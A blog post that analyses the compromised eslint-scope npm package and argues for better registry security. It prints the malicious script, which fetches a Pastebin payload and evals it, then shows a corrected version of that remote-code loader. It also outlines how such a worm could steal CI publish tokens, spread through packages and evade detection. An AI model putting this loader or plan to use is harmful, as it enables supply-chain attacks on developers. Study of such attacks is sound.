How to build an npm worm

npm is a registry and package manager for JavaScript that ships as part of Node.js. It's used by tens of millions of people to install hundreds of thousands of packages billions of times every week.

Today it was reported that eslint-scope (an npm package with 59 million downloads) had been compromised.

A new version of the package was published which contained a malicious script that was attempting to spread itself to other npm authors.

This type of script is known as a "worm" and while npm did a good job shutting it down, they lucked out because the script contained a bug which prevented it from spreading and caused it to get reported immediately.

Fluke

I don't think anyone has tried to name this worm yet, so I'm going to come up with a name for the purposes of this post.

I'm going to call it "The Fluke Worm", since a "fluke" is a type of parasitic worm, and while this worm could have been really bad, we lucked out because the author fucked up the code.

This was the script (I've cleaned it up for readability):

try {
  var https = require('https');
  https.get({
    hostname: 'pastebin.com',
    path: '/raw/XLeVP82h',
    headers: {
      'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',
      'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
  }, response => {
    response.setEncoding('utf8');
    response.on('data', contents => {
      eval(contents);
    });
    response.on('error', () => {});
  }).on('error', () => {});
} catch (err) {}

While the author of Fluke tried really hard to prevent any errors from being thrown (going as far as wrapping an asynchronous https.get call with a synchronous try-catch), it still managed to throw an error (Oh JavaScript, you reliable... you).

If you're wondering what the bug was, they opened a response stream and listened for data but didn't wait until the response closed before eval()-uating the response. Let me fix that for you:

let contents = '';
response.on('data', chunk => {
  contents += chunk.toString();
});
response.on('end', () => {
  eval(contents);
});
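
To see why per-chunk handling falls over, here's a minimal sketch. It's my own illustration, not anything from the worm: it uses a plain EventEmitter as a stand-in for the HTTP response, and JSON.parse instead of eval so nothing dangerous runs. The helper name collectJson and the sample payload are made up for this example.

```javascript
const { EventEmitter } = require('events');

// Buffers every chunk and only parses once the stream has ended.
function collectJson(response, callback) {
  let body = '';
  response.on('data', chunk => {
    body += chunk;
  });
  response.on('end', () => {
    let value;
    try {
      value = JSON.parse(body);
    } catch (err) {
      callback(err);
      return;
    }
    callback(null, value);
  });
}

// Stand-in for an HTTP response (assumption: a real response emits the
// same 'data' and 'end' events, possibly with many chunks).
const fakeResponse = new EventEmitter();

// The buggy approach: try to use each chunk on its own.
const perChunkErrors = [];
fakeResponse.on('data', chunk => {
  try {
    JSON.parse(chunk);
  } catch (err) {
    perChunkErrors.push(err.name);
  }
});

// The buffered approach.
let parsed = null;
collectJson(fakeResponse, (err, value) => {
  parsed = err ? null : value;
});

// Deliver one payload split across two chunks, then end the stream.
fakeResponse.emit('data', '{"name": "esl');
fakeResponse.emit('data', 'int-scope"}');
fakeResponse.emit('end');

console.log(perChunkErrors); // each fragment fails to parse on its own
console.log(parsed);         // the buffered body parses as a whole
```

Neither fragment is valid on its own, but the concatenated body is. Whether a real response arrives in one chunk or several depends on the network, which is why this kind of bug can look fine in testing and then blow up in the wild.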

But while the script may have its issues, it's important to know what it was attempting to do.

It uses Node's built-in https module to (attempt to) make a request to a Pastebin URL (which has since been deleted) and evaluate the contents.

By using a Pastebin, the author of Fluke could have tried to make updates to the worm simply by editing the contents.

Luckily Fluke (as far as we now know) only seems to have infected one major package.

In response, npm has taken the published version of the package down and has invalidated every npm token so that developers will have to log in again. They are also advising that you use 2-Factor Authentication.

Worms

Let's take a step back and understand what a worm is.

A "worm" is a piece of malicious code which attempts to spread itself to as many machines as possible.

Worms need something that connects the computers they spread between. Most of the time this is the network (either the public internet or private intranets), although if you go back far enough you can find worms that spread through floppy disks and such.

In this case, the thing that is connecting us is npm.

npm currently claims to have about 10 million users. Those users include everyone from new programmers in a coding bootcamp to multi-billion dollar corporations.

npm also reports that they have about 5 billion individual package downloads per week. With about 10 million users, that's roughly 500 package downloads a week per user.

And that's important because a worm like this can take advantage of how often people are downloading code from the internet in order to spread itself as fast as possible. And it needs to spread as fast as possible in order to infect everyone before being detected.

If this worm hadn't been broken, it could have infected hundreds (maybe even thousands) of packages before being detected.

If it had been more sophisticated, it could have been much harder to kill completely.

Let's quickly talk about how Fluke could have gone down.

In order to grow as fast as possible, Fluke needs to insert itself into something that gets installed by many people. In this case it targeted one of ESLint's internal packages.

ESLint has been downloaded over 130 million times, and its contributors included people who also worked on:

If you keep traversing the graph of packages that depend on one another, as well as the graph of authors who have access to other packages, it doesn't take long to infect the entire registry.
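
Here's a rough sketch of that traversal as a way to estimate the blast radius of one compromised package. Everything in it is hypothetical: the package names, the authors, and the simplified model (anyone who maintains a package that depends on a compromised one is assumed to install it, and everything they can publish is then exposed). Real registry data is a lot messier.

```javascript
// Hypothetical toy registry: none of these packages or authors are real.
// package -> authors with publish access
const publishers = {
  'pkg-a': ['alice'],
  'pkg-b': ['alice', 'bob'],
  'pkg-c': ['bob'],
  'pkg-d': ['carol'],
  'pkg-e': ['dave'],
};

// package -> packages it depends on
const dependsOn = {
  'pkg-a': [],
  'pkg-b': ['pkg-a'],
  'pkg-c': [],
  'pkg-d': ['pkg-c'],
  'pkg-e': [],
};

// Breadth-first walk over both graphs, starting from one compromised package.
function exposedPackages(start, publishers, dependsOn) {
  const seen = new Set([start]);
  const queue = [start];

  while (queue.length > 0) {
    const pkg = queue.shift();

    // Authors of packages that depend on `pkg` end up installing it.
    const exposedAuthors = new Set();
    for (const [dependent, deps] of Object.entries(dependsOn)) {
      if (deps.includes(pkg)) {
        for (const author of publishers[dependent] || []) {
          exposedAuthors.add(author);
        }
      }
    }

    // Everything those authors can publish is now exposed too.
    for (const [candidate, authors] of Object.entries(publishers)) {
      if (!seen.has(candidate) && authors.some(a => exposedAuthors.has(a))) {
        seen.add(candidate);
        queue.push(candidate);
      }
    }
  }

  return [...seen].sort();
}

console.log(exposedPackages('pkg-a', publishers, dependsOn));
// → [ 'pkg-a', 'pkg-b', 'pkg-c', 'pkg-d' ]
```

In this toy registry, four of the five packages are exposed starting from a single one. Only pkg-e escapes, because its author never installs anything that was touched.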

So like... it's a pretty good target.

But how does it get introduced?

Well I'm not sure exactly how it happened in this case, but here's one scenario that I've had to think about in the past.

Pretty much every major open source project out there (at least in the JavaScript/Node community) will have automated CI that runs on pull requests.

This CI is just there to run your tests, and it provides a nice feedback loop to contributors, but since it runs automatically the second a pull request is opened, you need to be careful what that CI process has access to.

Many users of npm (including lots of major open source projects) choose to use Continuous Deployment systems to automatically publish new versions of their npm packages as things get merged into their master branch. Most of the time, this is done in the same CI system as tests.

In order to publish to npm, you need to have a "token" (something to tell npm that you are authenticated). And in order to publish to npm automatically in CI, you need to put this token into your environment variables.

Most of the time, people configure these environment variables in such a way that both your "master" build and your "pull request/branch" build get the same environment variables.

This means that simply by opening a pull request into the right repo, you can gain authorization to publish packages.

Cool.
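
If you want a quick tripwire for that misconfiguration, something like the sketch below can run as part of your build. It assumes Travis CI (which sets TRAVIS_PULL_REQUEST to the pull request number, or to the string "false" for other builds) and assumes your token lives in a variable called NPM_TOKEN, which is a common convention rather than a requirement. The function name auditCiEnv is made up for this example.

```javascript
// Returns a list of warnings for a CI environment.
// `env` is a plain object such as process.env.
function auditCiEnv(env) {
  const warnings = [];

  // Assumption: Travis CI semantics, where any value other than "false"
  // means this build was triggered by a pull request.
  const isPullRequest =
    env.TRAVIS_PULL_REQUEST !== undefined &&
    env.TRAVIS_PULL_REQUEST !== 'false';

  // Assumption: the publish token is stored under this name.
  const hasToken = Boolean(env.NPM_TOKEN);

  if (isPullRequest && hasToken) {
    warnings.push(
      'NPM_TOKEN is visible to a pull request build; ' +
      'restrict it to trusted branch builds in your CI settings.'
    );
  }

  return warnings;
}

const warnings = auditCiEnv(process.env);
for (const warning of warnings) {
  console.error('WARNING: ' + warning);
}
if (warnings.length > 0) {
  process.exitCode = 1; // fail the build so somebody notices
}
```

To be clear, this only catches the mistake on honest builds. A malicious pull request can simply delete the check, so the real fix has to happen in the CI settings, where the token should never be handed to pull request builds in the first place.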

But then it gets even easier. Now that the worm has infected a major package, anyone who then downloads the package will then also be infected.

If they happen to be logged into the npm registry (which the majority of npm users with accounts likely are) then this worm can easily add itself to any other packages that they have publish access to.

As the worm spreads itself to more and more packages, at some point it is inevitably going to be detected. It may take a couple of hours or in very bad cases a couple of days.

But how could it avoid detection for as long as possible?

Well first we need to know how people would discover it. There's a couple obvious ones:

A "well-designed" worm would know about these sort of things and would take precautions to avoid getting caught.

The better the worm hides, the more time it will have to infect. Security-minded people can do a much better job than the above list.

Any worm presumably has a purpose beyond just spreading itself (although maybe someone just wants the bragging rights).

They might want to steal data. They might want to do damage to the machine. These days there's a good chance they want to mine bitcoins on everyone's computer. (Crypto-currencies are stupid and bad, don't @ me)

Because Node runs with full access to the file system and network by default, you can do a whole lot with people's machines. Not to mention the fact that many users run npm with sudo.

Oh, and just in case the worm wants to make sure it doesn't get stopped early on, it might even go as far as continuing to fight even after it's been noticed. There are plenty of ways to do that.

You can see that Fluke was trying to do that by using an editable Pastebin so that it could keep updating the code to do new things.

That's right, worms can be built to auto-update, finding new creative ways to be a pain in the ass for the people trying to stop them.

Maybe it'll even set up a daemon to keep injecting itself into packages even after it has been removed from them.

Trust

You may be wondering...

What the fuck Jamie? Why are you teaching everyone how to create a worm like this? Do you have to expose it to the entire world?!

For starters, I'm not exposing it to the entire world... That already happened:

Vulnerability Note VU#319816 - "npm fails to restrict the actions of malicious npm packages"

npm allows packages to take actions that could result in a malicious npm package author to create a worm that spreads across the majority of the npm ecosystem.

Thousands of people already know about this vulnerability, and the vast majority of them are completely capable of exploiting it. The only reason people haven't exploited it so far is:

  1. Because they are decent people.
  2. Because they have something to lose if other people start exploiting it.

You see, the truth is that this massive community we've built is built on trust.

npm trusts that its users won't do anything malicious, and if they do, npm trusts that they'll be able to catch it before it does anything too harmful.

Trust is a big deal in the security industry. If you want users to give you control over their data, they need to trust you.

When you lose people's trust, your business is in danger. Just ask Facebook who lost billions of dollars by handing user data over to Cambridge Analytica (and so many others).

If you want to gain and keep users' trust, you need to do everything you can to protect them.

npm

npm knows its security flaws. It's been alerted about them many times. I was joking about them with the COO just the other day.

But look at the response from npm when the ability to build a worm was disclosed over 2 years ago:

Jan 7 2016 – Response from npm

Jan 8 2016 – Confirmation of works as intended no intention to fix at the moment from npm.

There was room to do something more there. And in the two years since then, despite it coming up regularly, the registry hasn't done much to prevent what almost happened today.

They've introduced 2-Factor Authentication, they've introduced lockfiles, they've acquired a Node security startup, and started building auditing tools. And while they all help quite a bit, they don't solve the core problem of publishing with a long-living token.

A worm can still be installed on a logged in machine that has a valid token and publish new versions of packages. A worm can still take advantage of postinstall scripts to spread itself because npm doesn't lock them down at all.
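
If you want to at least see which of your dependencies run code at install time, here's a minimal sketch. The function name findInstallScripts and the sample manifest are mine. The hook names (preinstall, install, postinstall) are npm's standard install lifecycle scripts, and the function just takes an already-parsed package.json object.

```javascript
// npm lifecycle scripts that run automatically when a package is installed.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Given a parsed package.json, list the install-time scripts it declares.
function findInstallScripts(pkg) {
  const scripts = pkg.scripts || {};
  return INSTALL_HOOKS
    .filter(name => typeof scripts[name] === 'string')
    .map(name => ({ name, command: scripts[name] }));
}

// Hypothetical manifest, for illustration only.
const example = {
  name: 'some-package',
  scripts: {
    test: 'mocha',
    postinstall: 'node ./build.js',
  },
};

console.log(findInstallScripts(example));
// → [ { name: 'postinstall', command: 'node ./build.js' } ]
```

You could run something like this over every package.json under node_modules and review what comes back. You can also install with `npm install --ignore-scripts` to skip these hooks entirely, although packages that genuinely need a build step will break, and none of this stops malicious code that runs when the package is actually required.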

The reason they have stated for not addressing these problems head on is because any security solution would get in the way of users. It'd be harder to publish npm packages, and even harder to automate.

And you see, harder npm publishing means harder npm adoption. My fear is that they are refusing to do something here because they are a startup focused on growth. Their VCs are undoubtedly demanding that growth.

Capitalism strikes again I guess.

Sigh.

It's on npm to fix this problem, and until they do we're gonna keep being at risk. And I hate that. I hate being put in this position where I'm the bad guy for trying to raise awareness of something so important.

I got into open source because it was fun. I stayed because I saw how much we can improve the world around us. I take it seriously because I know how much we have to lose.

It bothers me greatly that npm is a private company. It bothers me that npm is closed-source (the registry and server). It bothers me because I can't contribute. I can only inform the community of the problems.

I get it #HugOps. I don't want to ruin anyone at npm's day.

But if npm was open source (not just the client), we wouldn't have to hug ops. We could contribute back. I know there are security engineers at every major company these days that would kill for the opportunity to improve npm's security.

The question becomes: Why do we give a private company a monopoly over the Node ecosystem if they refuse to open source their software?

Fix

But the reason I really wanted to write this article is that I want things to get better. I don't want worms to be successful because the community was uneducated on how they work and what to do about them.

Security through obscurity is thankfully pretty effective, but it's dangerous to build something important on. The npm ecosystem and community play a vital role in how many people in the world write code. They shouldn't depend on security through obscurity.

So npm has lost some trust today, and now we find ourselves in the position where we need to protect ourselves from npm.

npm has already revoked all your tokens, but please:

But honestly, the amount of work we'd all need to put in to truly prevent this from happening again... it's just never going to happen.

You can ask each individual user to go out of their way to voluntarily secure themselves, but the reality is that most won't. Most won't even hear the message that they need to.

And the next worm might not be a fluke.